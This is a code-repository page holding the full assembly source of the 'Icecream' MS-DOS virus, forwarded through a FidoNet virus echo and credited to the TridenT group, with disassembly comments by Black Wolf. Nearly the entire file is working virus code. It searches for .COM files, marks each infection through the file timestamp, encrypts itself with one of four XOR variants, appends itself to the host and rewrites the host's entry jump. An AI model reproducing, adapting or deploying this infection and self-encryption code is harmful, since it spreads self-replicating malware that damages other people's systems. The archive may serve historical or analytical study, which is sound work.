MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir51.asm
2021-01-12 18:07:35 -06:00

293 lines
8.1 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 41 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 17:48)
;* To : Ron Toler
;* Subj : ICECREAM.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;Icecream Virus by the TridenT virus research group.
;This is a simple direct-action com virus that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It will infect one .COM file in the current directory every time it is
;executed. It marks infections with the time stamp.
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
db 0e9h,0ch,0 ;jmp Virus_Entry
Author_Name db 'John Tardy'
db 0E2h,0FAh
Virus_Entry:
push ax
call Get_Offset
Get_Offset:
pop ax
sub ax,offset Get_Offset
db 89h,0c5h ;mov bp,ax
lea si,[bp+Storage]
mov di,100h ;Restore file
movsw
movsb
mov ah,1Ah
mov dx,0f900h
int 21h ;Set DTA
mov ah,4Eh
FindFirstNext:
lea dx,[bp+ComMask]
xor cx,cx
int 21h ;Find File
jnc InfectFile
Restore_DTA:
mov ah,1Ah
mov dx,80h
int 21h ;Set DTA to default
mov bx,offset start
pop ax ;Return to host
push bx
retn
InfectFile:
mov ax,4300h
mov dx,0f91eh
int 21h ;Get file attribs
push cx ;save 'em
mov ax,4301h
xor cx,cx
int 21h ;Set them to 0
mov ax,3D02h
int 21h ;Open file
mov bx,5700h
xchg ax,bx
int 21h ;Get file time
push cx
push dx ;save it
and cx,1Fh
cmp cx,1 ;check for infection
jne ContinueInfection
db 0e9h,69h,0 ;jmp DoneInfect
ContinueInfection:
mov ah,3Fh
lea dx,[bp+Storage]
mov cx,3
int 21h ;Read in first 3 bytes
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah ;Is it an EXE?
je DoneInfect
cmp ax,5A4Dh
je DoneInfect ;Other EXE signature?
pop dx
pop cx
and cx,0FFE0h ;Change stored time values
or cx,1 ;to mark infection
push cx
push dx
mov ax,4202h ;Go to the end of the file
call Move_FP
sub ax,3
mov cs:[JumpSize+bp],ax ;Save jump size
add ax,10Fh ;Save encryption starting
mov word ptr [bp+EncPtr1+1],ax ;point....
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption ;Encrypt virus
mov ah,40h
mov dx,0fa00h
mov cx,1F5h
int 21h ;Write virus to file
mov ax,4200h
call Move_FP ;Go to the beginning of file
mov ah,40h
lea dx,[bp+JumpBytes]
mov cx,3
int 21h ;Write in jump
call FinishFile
jmp Restore_DTA
DoneInfect:
call FinishFile
mov ah,4Fh
jmp FindFirstNext
Move_FP:
xor cx,cx
xor dx,dx
int 21h
ret
FinishFile:
pop si dx cx
mov ax,5701h ;Reset file time/date stamp
int 21h ;(or mark infection)
mov ah,3Eh
int 21h ;Close new host file
mov ax,4301h
pop cx
mov dx,0fc1eh
int 21h ;Restore old attributes
push si
retn
Message db ' I scream, you scream, we both '
db 'scream for an ice-cream! '
SetupEncryption:
xor byte ptr [bp+10Dh],2
xor ax,ax
mov es,ax
mov ax,es:[46ch] ;Get random number
push cs
pop es
push ax
and ax,7FFh
add ax,1E9h
mov word ptr [bp+EncSize1+1],ax
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3
shl ax,1
mov si,ax
mov ax,[bp+si+EncData1]
add ax,bp
mov si,ax
lea di,[bp+103h]
movsw
movsw
movsw
movsw ;Copy Encryption Algorithm
pop ax
stosb
movsb
mov dl,al
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch
rep movsb
lea si,[bp+10Fh]
mov cx,1E9h
EncryptVirus:
lodsb
db 30h,0d0h ;xor al,dl
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
KeyWasZero: ;If key is zero, increase
mov si,offset AuthorName ;jump size and place name
mov di,0fa00h ;at beginning....
mov cx,0Ah
rep movsb
mov ax,cs:[JumpSize+bp]
add ax,0Ch
mov cs:[JumpSize+bp],ax
retn
db '[TridenT]'
EncData1 dw 02beh
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
Encryptions:
;------------------------------------------------------------
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h
;------------------------------------------------------------
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
;------------------------------------------------------------
AuthorName db 'John Tardy'
JumpBytes db 0E9h
JumpSize dw 0
ComMask db '*.CoM',0
Storage dw 20CDh
db 21h
end start
;-+- GEcho 1.10+
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/x Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)